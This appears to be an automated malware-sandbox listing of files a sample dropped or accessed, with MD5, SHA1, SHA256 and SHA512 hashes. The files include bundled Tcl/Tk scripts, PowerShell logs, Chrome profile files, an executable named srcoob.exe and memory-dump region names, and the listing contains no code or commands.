C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\tk\ttk\clamTheme.tcl

MD5 beced087eeb3d5c9b2eabdb19c030d52
SHA1 be285e65905d335be442606afa3a88e408d5ec5b
SHA256 93c29536262c582104bf1804d7b06c7565b7d621f2e3605ff8b6c981a3b4ab01
SHA512 84b733c3fbe63c32b5b1e6cd132bd1b55f07b47612b70455c17c4d6d239682672c838cc3d739283079d0d2d8567fca9b763465d8d2148d25b5952282ed521a79

C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\tk\ttk\altTheme.tcl

MD5 ae1b9c4dc2de8e899749fb4e1fcb4df6
SHA1 2a09d325ca56c930b3afb1ee43c944fd4416b8e1
SHA256 92b8be9d8934850b6d240b970603b0ad7c6dd4a45134545694fb52966d742861
SHA512 2803f96729805c90143e0c4c9bf25398bac7d6e4402cb09be354c35566fc3c3bd9522372147c0e956bdbbc2943b9aecb0f5c96b527a26fd790b8fdb5b99efe10

C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\tk\ttk\classicTheme.tcl

MD5 70f3edfbfd4c16febdd8311290a0effe
SHA1 4b1d63d59c72c357931a8cbbf071654492a9b371
SHA256 c7b1f40d77820fbaf2195f2bb3f334b38fec653fe47653f9e30a01ad4ca63ba5
SHA512 a58c584ada6d271316266d58641be260f98e6fa0ae867ee9e343807a2955ddd3544b864cca80dc7f164ed4be5331575b696650ff0bb469c3647c5cb122f2a64c

C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\tk\ttk\defaults.tcl

MD5 16843ecd9e716a87d865a6539ef44751
SHA1 3df76af0d6e4c386d63dd061100702dbb0f72a42
SHA256 d83248b535a9417ce0ca598bbe245f24252adc90e3611c1191a045d9c0a9c99f
SHA512 7f5e7a200fd6b012a9336035211d9d89f0504f61156629ebcc1a03bcf8462ba8d219de376b6bb3ebb9e6a9507f0ac6f7d658eed5b953110df553b3c0c44ebc1d

C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\tk\ttk\sizegrip.tcl

MD5 3c8916a58c6ee1d61836e500a54c9321
SHA1 54f3f709698fad020a048668749cb5a09ede35ab
SHA256 717d2edd71076ea059903c7144588f8bbd8b0afe69a55cbf23953149d6694d33
SHA512 2b71569a5a96cac1b708e894a2466b1054c3fae5405e10799b182012141634bd2a7e9e9f516658e1a6d6e9e776e397608b581501a6cfe2eb4ec54459e9ecb267

C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\tk\ttk\treeview.tcl

MD5 5bec78db1a86b4bc17a5108806c5371e
SHA1 4b2b08240f778864c5045f546a620702ae126ccb
SHA256 0e05adf29b616989cb4724e57a26f1044598781f0cc10d5eb5ac4af7d705ddca
SHA512 29dff439bb5caa23f8f38ea136406fa2db68be021068f80bad2e2ec811ae5c5b08f4f287719db946db780122af05654392ea771fb523bdc1569b364689d3ec86

C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\tk\ttk\spinbox.tcl

MD5 ebce661f8125f54c7dff9f076fb2bfe2
SHA1 966603a85eadba4e003e8307a7e581cd6839716f
SHA256 7c2ffd7308bdea852851335d5b5eb5dcca0e4d4a0cea16f786b40009ffd58b71
SHA512 35f518e20986ab951ff33091f405ea1647534ccb77c8c36a94b1ab4a973df3ed52355864702b6526888830af8c912105e542027b5d68f81ac2a9f40ad2ba2632

C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\tk\ttk\combobox.tcl

MD5 06b885722c8555668bcbe8d7d9aa4c75
SHA1 8172c8886884de462549aa94fca440b99da90583
SHA256 057f8f447de3a753714b8f82b96054e1849a2424749f3482492eae192baacdcf
SHA512 d81ab53d48ed1d79da57fc2d2b599199ee985e237046244a2f820daacd2e8565c65d63e9b6f80175c30fd48290226a547d6d603293a4b7e4a455795f7fce7179

C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\tk\ttk\entry.tcl

MD5 3dea98c515f6f731e666656da9708f12
SHA1 212865fc5c635eeca380efc1b3fbb85554714c47
SHA256 fe32f8b154893218acaba93ac4b8e1170d9b3e3ab66df63df85c0a31c17592be
SHA512 2901b5f92df95cbd1ec71acf86646af2f1d6058232eef1b5779192bad6df0bbbbc5902e363f809671f06d13270b1581d55f611556d48b1a843194477a113aeab

C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\tk\ttk\panedwindow.tcl

MD5 a12915fa5caf93e23518e9011200f5a4
SHA1 a61f665a408c10419fb81001578d99b43d048720
SHA256 ce0053d637b580170938cf552b29ae890559b98eb28038c2f0a23a265ddeb273
SHA512 669e1d66f1223cca6ceb120914d5d876bd3cf401ee4a46f35825361076f19c7341695596a7dbb00d6cff4624666fb4e7a2d8e7108c3c56a12bda7b04e99e6f9a

C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\tk\ttk\notebook.tcl

MD5 82c9dfc512e143dda78f91436937d4dd
SHA1 26abc23c1e0c201a217e3cea7a164171418973b0
SHA256 d1e5267cde3d7be408b4c94220f7e1833c9d452bb9ba3e194e12a5eb2f9adb80
SHA512 a9d3c04ad67e0dc3f1c12f9e21ef28a61fa84dbf710313d4ca656bdf35dfbbfba9c268c018004c1f5614db3a1128025d795bc14b4fffaa5603a5313199798d04

C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\tk\ttk\progress.tcl

MD5 b0074341a4bda36bcdff3ebcae39eb73
SHA1 d070a01cc5a787249bc6dad184b249c4dd37396a
SHA256 a9c34f595e547ce94ee65e27c415195d2b210653a9ffcfb39559c5e0fa9c06f8
SHA512 af23563602886a648a42b03cc5485d84fcc094ab90b08df5261434631b6c31ce38d83a3a60cc7820890c797f6c778d5b5eff47671ce3ee4710ab14c6110dcc35

C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\tk\ttk\scale.tcl

MD5 b41a9df31924dea36d69cb62891e8472
SHA1 4c2877fbb210fdbbde52ea8b5617f68ad2df7b93
SHA256 25d0fe2b415292872ef7acdb2dfa12d04c080b7f9b1c61f28c81aa2236180479
SHA512 a50db6da3d40d07610629de45f06a438c6f2846324c3891c54c99074cfb7beed329f27918c8a85badb22c6b64740a2053b891f8e5d129d9b0a1ff103e7137d83

C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\tk\ttk\scrollbar.tcl

MD5 cf7bc1ffbf3efee2ca7369215a3b1473
SHA1 e2632241089f9dc47fa76cd0c57615d70753008c
SHA256 b3a0e10c95b28c90cccfc373152bd30ab7da2fb4c0e96409aeeb01d453f36b4a
SHA512 01841cda93aa0ce1a5b1fc65db153902b872b7e9d1030ef8902e086bbeb35649fd742dd96d1aed9cf620692fde6f4e2ccd865dc7a125452ffd16a65918956dda

C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\tk\ttk\menubutton.tcl

MD5 fe89894d8cbf415541a60d77192f0f94
SHA1 c0716b2d8e24592757b62d24eeed57121b60e00f
SHA256 d9af20135ef1bfeb3e0fd9fdabe821474de3ed43b3745a42fe564d24a8b9fd9c
SHA512 66488cbcac49cca47c9c560648e891d429f40e46549f58687b98073eba4807a8458a277be093ebfc50709a8a87a529df4e526eccfb60803ce16af17b97accd3d

C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\tk\ttk\button.tcl

MD5 ea7cf40852afd55ffda9db29a0e11322
SHA1 b7b42fac93e250b54eb76d95048ac3132b10e6d8
SHA256 391b6e333d16497c4b538a7bdb5b16ef11359b6e3b508d470c6e3703488e3b4d
SHA512 123d78d6ac34af4833d05814220757dccf2a9af4761fe67a8fe5f67a0d258b3c8d86ed346176ffb936ab3717cfd75b4fab7373f7853d44fa356be6e3a75e51b9

C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\tk\ttk\utils.tcl

MD5 f868a26a299885824b14ca28f68039ce
SHA1 e37a1889e6cc215102ec078d0455622415ed8486
SHA256 6c35cd6c7f3ac4be3fe0cc7633dbbde5123155921a441ba702b4347e6f967f34
SHA512 14d8fd30fe670ce4630ce5b7b1e4b04a2a3f97d6483d87d0d7a2b675e880ab75e947820a4babd337452d683e0cbb7b92b4c866af19a8dcd5711016e012d597e2

C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\tk\ttk\cursors.tcl

MD5 74596004dfdbf2ecf6af9c851156415d
SHA1 933318c992b705bf9f8511621b4458ecb8772788
SHA256 7bdffa1c2692c5d1cf67b518f9acb32fa4b4d9936ed076f4db835943bc1a00d6
SHA512 0d600b21db67bf9dadbdd49559573078efb41e473e94124ac4d2551bc10ec764846dc1f7674daa79f8d2a8aeb4ca27a5e11c2f30ede47e3ecee77d60d7842262

C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\tk\ttk\fonts.tcl

MD5 7017b5c1d53f341f703322a40c76c925
SHA1 57540c56c92cc86f94b47830a00c29f826def28e
SHA256 0eb518251fbe9cf0c9451cc1fef6bb6aee16d62da00b0050c83566da053f68d0
SHA512 fd18976a8fbb7e59b12944c2628dbd66d463b2f7342661c8f67160df37a393fa3c0ce7fdda31073674b7a46e0a0a7d0a7b29ebe0d9488afd9ef8b3a39410b5a8

C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\tk\ttk\ttk.tcl

MD5 e38b399865c45e49419c01ff2addce75
SHA1 f8a79cbc97a32622922d4a3a5694bccb3f19decb
SHA256 61baa0268770f127394a006340d99ce831a1c7ad773181c0c13122f7d2c5b7f6
SHA512 285f520b648f5ec70dd79190c3b456f4d6da2053210985f9e2c84139d8d51908296e4962b336894ee30536f09fae84b912bc2abf44a7011620f66cc5d9f71a8c

C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\tk\text.tcl

MD5 33230f852aac8a5368aeba1834dcec77
SHA1 beba97c48a110f4a9fe86f60e5fd4ca6ac55e964
SHA256 f26ed909a962d02bc03585a6c756f4fe992c311c7f53648137e427747120b441
SHA512 caac54334c4eb439c18f03eeb5de83aa6bbd6bb07b760a40c60f2d34f5ee1fdd542f83ad427059863f96b0a8f2cb96658171a7cd0c0c2c49e002bd02e6d418f6

C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\tk\spinbox.tcl

MD5 9971530f110ac2fb7d7ec91789ea2364
SHA1 ab553213c092ef077524ed56fc37da29404c79a7
SHA256 5d6e939b44f630a29c4fcb1e2503690c453118607ff301bef3c07fa980d5075a
SHA512 81b4cec39b03fbeca59781aa54960f0a10a09733634f401d5553e1aaa3ebf12a110c9d555946fcdd70a9cc897514663840745241ad741dc440bb081a12dcf411

C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\tk\scrlbar.tcl

MD5 b44265f793563ad2ad66865dec63b2c2
SHA1 23e6f7095066ed3b65998324021d665d810e6a93
SHA256 189e7ee4b67861001c714a55880db34acf7d626a816e18b04b232af9e6e33e81
SHA512 3911b13f42091620d8d96ed0cc950792175f88399912092161e1a71f564c7e72b6d448d3b761b6b6b73400ccc8fabd94cb3bfcc8cb3ad8ebdb590c3ffc623dfb

C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\tk\scale.tcl

MD5 1ce32cdaeb04c75bfceea5fb94b8a9f0
SHA1 cc7614c9eade999963ee78b422157b7b0739894c
SHA256 58c662dd3d2c653786b05aa2c88831f4e971b9105e4869d866fb6186e83ed365
SHA512 1ee5a187615ae32f17936931b30fea9551f9e3022c1f45a2bca81624404f4e68022fcf0b03fbd61820ec6958983a8f2fbfc3ad2ec158433f8e8de9b8fcf48476

C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\tk\panedwindow.tcl

MD5 2da0a23cc9d6fd970fe00915ea39d8a2
SHA1 dfe3dc663c19e9a50526a513043d2393869d8f90
SHA256 4adf738b17691489c71c4b9d9a64b12961ada8667b81856f7adbc61dffeadf29
SHA512 b458f3d391df9522d4e7eae8640af308b4209ce0d64fd490bfc0177fde970192295c1ea7229ce36d14fc3e582c7649460b8b7b0214e0ff5629b2b430a99307d4

C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\tk\menu.tcl

MD5 12ec5260eb7435c7170002e011fe8f17
SHA1 e88f5423a7133784a1a2d097c4e602e5de564034
SHA256 588727079af7ecc44755efe33ebb7414ad2ee68390fc249ce073d38e03c78a4e
SHA512 5848e5a642f0cfba8b456a6dcef711737229e5f59beb7981a52440a47f5ba9ec85374be8e8b1ccdd952ac71164da04ff88ef07204fd62509952db2cdb6503700

C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\tk\listbox.tcl

MD5 b3b6a3bd19ddde4a97ea7cf95d7a8322
SHA1 2f11d97c091de9202f238778c89f13a94a10d3be
SHA256 b92526a55409c67473740551ca128498824d25406e3cc9bb0544e8296d3c5de4
SHA512 f2bc1fbbd20132725d283b9fab20c3e38ed185a62297e1418572c03fa90b3f813b878be281bb4bdfa1c813b7ee7eff11cbb2f89b5411b1707d90b0e5fd746fb3

C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\tk\entry.tcl

MD5 1d9ff9bb7fedb472910776361510c610
SHA1 c190dd07bcc55741b9bdfc210f82df7b7c2fac81
SHA256 dd351da6288cf7e9f367fd97c97cb476193ff7461b25e31667e85fe720edea04
SHA512 85d25622f4e0c9517d8caa454ec4e81c8cbbec25e418f5a2d885d5561999cfb3c3026aac8bf1ca6f9b40993802fda86d60ff8fd2e30a77d56f1c1914af695f03

C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\tk\button.tcl

MD5 cf6e5b2eb7681567c119040939dd6e2c
SHA1 3e0b905428c293f21074145fe43281f22e699eb4
SHA256 2f013b643d62f08ddaaa1dea39ff80d6607569c9e1acc19406377b64d75ccf53
SHA512 be03edea59be01d2b8de72b6ebe9dceb13d16c522bb5c042cdae83c84eafc6ac7b3650bf924f5f84f4f126634f9d17d74d087316d289f237129921a89aa4e0c8

C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\tk\icons.tcl

MD5 2652aad862e8fe06a4eedfb521e42b75
SHA1 ed22459ad3d192ab05a01a25af07247b89dc6440
SHA256 a78388d68600331d06bb14a4289bc1a46295f48cec31ceff5ae783846ea4d161
SHA512 6ecfbb8d136444a5c0dbbce2d8a4206f1558bdd95f111d3587b095904769ac10782a9ea125d85033ad6532edf3190e86e255ac0c0c81dc314e02d95cca86b596

C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\tcl\opt0.4\pkgIndex.tcl

MD5 92ff1e42cfc5fecce95068fc38d995b3
SHA1 b2e71842f14d5422a9093115d52f19bcca1bf881
SHA256 eb9925a8f0fcc7c2a1113968ab0537180e10c9187b139c8371adf821c7b56718
SHA512 608d436395d055c5449a53208f3869b8793df267b8476ad31bcdd9659a222797814832720c495d938e34bf7d253ffc3f01a73cc0399c0dfb9c85d2789c7f11c0

C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\tcl\http1.0\pkgIndex.tcl

MD5 10ec7cd64ca949099c818646b6fae31c
SHA1 6001a58a0701dff225e2510a4aaee6489a537657
SHA256 420c4b3088c9dacd21bc348011cac61d7cb283b9bee78ae72eed764ab094651c
SHA512 34a0acb689e430ed2903d8a903d531a3d734cb37733ef13c5d243cb9f59c020a3856aad98726e10ad7f4d67619a3af1018f6c3e53a6e073e39bd31d088efd4af

C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\tk\pkgIndex.tcl

MD5 d942ff6f65bba8eb6d264db7d876a488
SHA1 74d6ca77e6092d79f37e7a1dcd7cced2e89d89cb
SHA256 e0bac49b9a3f0e50be89f692273cea7b7462bfc3e054f323261ef99b708c70a3
SHA512 3ac7d992300252109606074aefb693a31cd5cceffb6d7b851a2c8895a0d5e165a139b7038657306128af39c44785b7b4da35b8e1aeb4c30f3f7e7cfcfb789c4c

C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\tcl\package.tcl

MD5 55e2db5dcf8d49f8cd5b7d64fea640c7
SHA1 8fdc28822b0cc08fa3569a14a8c96edca03bfbbd
SHA256 47b6af117199b1511f6103ec966a58e2fd41f0aba775c44692b2069f6ed10bad
SHA512 824c210106de7eae57a480e3f6e3a5c8fb8ac4bbf0a0a386d576d3eb2a3ac849bdfe638428184056da9e81767e2b63eff8e18068a1cf5149c9f8a018f817d3e5

C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\tcl8\8.5\msgcat-1.6.1.tm

MD5 db52847c625ea3290f81238595a915cd
SHA1 45a4ed9b74965e399430290bcdcd64aca5d29159
SHA256 4fdf70fdcedef97aa8bd82a02669b066b5dfe7630c92494a130fc7c627b52b55
SHA512 5a8fb4ada7b2efbf1cadd10dbe4dc7ea7acd101cb8fd0b80dad42be3ed8804fc8695c53e6aeec088c2d4c3ee01af97d148b836289da6e4f9ee14432b923c7e40

C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\tcl\tm.tcl

MD5 52db1cd97ceab81675e86fa0264ea539
SHA1 b31693b5408a847f97ee8004fed48e5891df6e65
SHA256 6c02298d56e3c4c6b197afc79ec3ce1fc37ae176dc35f5d7ac48246f05f91669
SHA512 5032b0a79d0cd5a342af2f9edf8b88b7214e9aa61ba524a42c5be2286741e18fa380ad2d40dda9a0257afceed2ef6e48624013e854f37b5e41cb88a831ad04c9

C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\tk\tk.tcl

MD5 25094462d2ea6b43133275bf4db31a60
SHA1 6bb76294e8fdf4d40027c9d1b994f1ab0014b81b
SHA256 3e998b41ab23677db31902e1e876e644b279b2e6d8896443f6c434352801cdd1
SHA512 8bdae921f367b864ea7f36c9a549ee870d4e4e3c6e942d70722a84ae6b23ff00a33638d8ca8f3b9b8fe084875ba7c8976975849f4dc47cdb5671df47af68cfab

C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\tcl\auto.tcl

MD5 5e9b3e874f8fbeaadef3a004a1b291b5
SHA1 b356286005efb4a3a46a1fdd53e4fcdc406569d0
SHA256 f385515658832feb75ee4dce5bd53f7f67f2629077b7d049b86a730a49bd0840
SHA512 482c555a0da2e635fa6838a40377eef547746b2907f53d77e9ffce8063c1a24322d8faa3421fc8d12fdcaff831b517a65dafb1cea6f5ea010bdc18a441b38790

C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\tcl\tclIndex

MD5 996f74f323ea95c03670734814b7887f
SHA1 49f4b9be5ab77e6ccab8091f315d424d7ac183f3
SHA256 962c60eb7e050061462ff72cec9741a7f18307af4aaa68d7665174f904842d13
SHA512 c4694260c733dc534dc1a70791fa29b725efd078a6846434883362f06f7bf080ca07478208b1909630e1b55fbdccf14484b78b0a5b8c6dad90f190c8c9d88a56

memory/4384-1012-0x0000000005F50000-0x0000000005F6E000-memory.dmp

memory/2832-1058-0x0000000074FB0000-0x0000000074FFC000-memory.dmp

memory/2832-1057-0x0000000007260000-0x0000000007292000-memory.dmp

memory/4384-1059-0x00000000075C0000-0x0000000007C3A000-memory.dmp

memory/2832-1070-0x0000000007240000-0x000000000725E000-memory.dmp

memory/4384-1069-0x0000000006460000-0x000000000647A000-memory.dmp

memory/2832-1071-0x00000000072B0000-0x0000000007353000-memory.dmp

memory/4384-1072-0x00000000081F0000-0x0000000008794000-memory.dmp

memory/2832-1073-0x0000000007450000-0x000000000745A000-memory.dmp

memory/4384-1074-0x0000000007320000-0x00000000073B2000-memory.dmp

memory/2832-1075-0x0000000007670000-0x0000000007706000-memory.dmp

memory/2832-1076-0x00000000075E0000-0x00000000075F1000-memory.dmp

memory/2832-1077-0x0000000007620000-0x000000000762E000-memory.dmp

memory/2832-1078-0x0000000007630000-0x0000000007644000-memory.dmp

memory/2832-1079-0x0000000007710000-0x000000000772A000-memory.dmp

memory/2832-1080-0x0000000007660000-0x0000000007668000-memory.dmp

memory/3644-1090-0x000002986A8A0000-0x000002986A8C2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 77d622bb1a5b250869a3238b9bc1402b
SHA1 d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256 f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512 d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 98baf5117c4fcec1692067d200c58ab3
SHA1 5b33a57b72141e7508b615e17fb621612cb8e390
SHA256 30bf8496e9a08f4fdfe4767abcd565f92b6da06ca1c7823a70cb7cab16262e51
SHA512 344a70bfc037d54176f12db91f05bf4295bb587a5062fd1febe6f52853571170bd8ef6042cb87b893185bbae1937cf77b679d7970f8cc1c2666b0b7c1b32987d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

memory/2916-2046-0x00007FFA6F6C3000-0x00007FFA6F6C5000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 bc82866e29d9080747ac0732ad186ca8
SHA1 864e3bf1709fc02e486e6b092702b29e7db7abd6
SHA256 bd352235e969e3dbcd75e3865ef324ffcce6839fa87adddd9a7279006d6a3f3c
SHA512 2deeef5158ab9a34f79edd52da918ac053d9d150c30f2e56d4633d54a869d7b230b896b610c5053d15889d7f0abed7929f420165bb7c44ebd11f4364f95cb64b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 7e8b95da3f7293713e7e6276d6f6d5fa
SHA1 e77e83c6a876ce39ee342412843dd737051347b9
SHA256 f0a994eea753af6da90282d021c90c7a9fb3e92aaf66bec1de91d717849d7ee7
SHA512 f0d16979d2ef3bef95c7a55dd884e23481f9833b9880d0561abd83bc6887d09fbb9471da8cad2d97a238b4feff209382bb3865b1d24b8ced74833a985b5264f3

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 8899348c4fbcecc6945310340bbc6fce
SHA1 3d9677855c4f066a8a15ec1e2020038f2cbfa4c7
SHA256 9f6b11b4541a6882fc04837a066598ef4c199c7136fc442d3266608f8b6fbc6b
SHA512 4a359cc01306de3144173cc3be54d5cb0dc397ebd31cbf0e12df6d4f685d787b0f9d36d3465d272a739ea72a39b806c311dd34b8844d03661ff3d0151cec98e9

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 5bfdaf97c657d165c615ad5f29b5542d
SHA1 fe32da9a9753217bb3ae2d26a4a1a0719606549b
SHA256 f734eff49edb8f5759ab1fa0b8f5c2fee2cf8847f022e25763d8a2372565265f
SHA512 ac5db4880b80cedd0f6f59915f639107f38fa52c05d416293f5267d0ca91797f22cde9bf5574e008fcae3f949ec341a76cae25e48c53c200f9e1c78709b71d09

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 f7b6da1b6cf8ab6c0d6600ca70a56384
SHA1 b87741116b23e52683fad700d531c0f060f24b3d
SHA256 811c9ee665922b7abe27aa7278044098095f5acd96146db12171548e90ad9440
SHA512 edfc3c239778300ac2fff619cc0438393cf0be0e78e12a1eff79b4d80cd09db9af0e1b39046ed9a24fcf55c3f0dee6ed4ef0635635a26fba8aa63d9441cf727b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 41486b00e6312638519be94e717ea802
SHA1 9a1d2e5082af27f07b82619e9430a8e6c1aeed25
SHA256 33056b50b6488549ce43919e2892cc5ef73d9c5124b97c56a4cb6c62cb064f37
SHA512 004c23d21591dc69ac20c2689ea6f7d89409a843f7267537a63eb9be2ac39911be49c1ce8eb3520c7b5b9a788e008cecc58a59ed37958e6bf8fb0b70d6bd97fa

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 fa4eb0cd71e1e980ee342928fefd76dd
SHA1 e5316d202a9c117ff46466ba9021135d1f30753a
SHA256 5cf7040daa3f85856a4fbb38c6f9143ad4d0c4a85813c2cd698c04b6bee69891
SHA512 45d8c057de1b7057c8dc05069461557f525bad57d739c3435fbb3851e19d939b8a6c6ef0769c0ab56da7a4bac4cc3c485e91f8beedfbb484458dd35498c20bc8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 d519a34ae2017167b8f8fc90b6741fe1
SHA1 ffcae7e3e3901cc8e9f2b4f2f637cf0f9ea92373
SHA256 1c93cbb60b6838812bfbe6f97ba227275bf44a186da76b587500e1a954d0ad48
SHA512 d631f9ac1b60154e353d5ccae1a754a25789728737579e94321ebc17b607dd8920e634dd4b80ea65ebb74b20d95b4f7f1fef654d562b4fbdaf1d7e84e912ec9e

C:\Users\Admin\AppData\Roaming\Microsoft\Spelling\en-US\default.dic

MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

C:\Users\Admin\AppData\Local\Temp\srcoob.exe

MD5 32004d8a59efe46298e06798a1a96cb9
SHA1 da3c34b6d7d4f692e673e45dacc825b3ef17a2ed
SHA256 03ca5525ec9b76e0d61787679977fff9ed515e7c9d30100ba7d8499a8b62a47f
SHA512 34c25e4b7ec2f61c6df8da73a720a91ec01762b06be8b12308876711e6a3b44f2633b27a38f2c516ff0925cb5829b70e993167e989ceb9a328d7422f7ab41495

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 74ffa03d630fea014ba4f06e7974575d
SHA1 e55370dc4e280b0485c90c7ed95da49269af3c3e
SHA256 bb55605591767d58e38709e90deb0d54e0fba9a250bbec1a31c8f70b50090a70
SHA512 cb78490b9f5d986bc695f1665c17527a8863084cb62c29e3d99e8a46ed65838de989181197bf63a5a13e293604130969b43e4ef37287e4116d43fc90522b4110

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

MD5 0f74c553a707afeb5b71386cecda29f3
SHA1 3ae9c31b87e2a56bff7630cf1e780f87cdc27782
SHA256 bf18f82bd3cfd67d1e2734bff8a146b14b58a75f7fff12cbea12c1fe38f135f5
SHA512 b10e9cbebd62929cb804dbe01dd7474f33f1ebdda508d532d3c9fccdeaad65b7fb5d8f0e56ac635407048438b7129674311fdf88b98897d4c06fc67ea72ac3b8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe587133.TMP

MD5 4d09e96a8dc13b724e611ea30edcd7da
SHA1 c15787a055fabf74efcfe661a0e43e0b1447a292
SHA256 0da3b0c5a917cae6864ce03b68aed3a60e18600c5ad7e7ea0c9223f5513f88f8
SHA512 953a6f530e3aafd38b0f896d3d88a62cebb9e3c6a1428d36f02dda5d2775f3a18ebcd985786966bc2faa6e1e67210c812cde8530031ba6750682de04e14358a9

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 546c12c09157167203885fddb4dfbb56
SHA1 23d079f6b9d853775386eeb151eb9db0456f227e
SHA256 f54c19cd3e577b2b69fc971f1ed4a87a1dc02a00e7b8f920d63508aec107c70e
SHA512 178e3bc3925c574b56a9f61f06cf5d7d2a2ad04480e3b4dd254a3af7f4f4d5ebd98a4f5219f5269c96d8ea784540402c8b680c941dfdaf6073a3db35db6821bc

memory/2544-2593-0x0000027BBB500000-0x0000027BBB6C7000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

MD5 a85e5add31f209ed527bf82ac0768582
SHA1 9551a7f1878b70b64d4ed23aa8f5d69cc6f272b9
SHA256 9b28265c7c93e93355a28432984cef0ab471397329c2924745ff139d2a585c43
SHA512 4e216dc0fb62569a58c05a34e91658cf481db11e2d27589f1cc556ed2e986bf6d999a51dd35a6cc98c59be97f9f64df3ff084bdd8b8f1739f4589e7c47e11bbc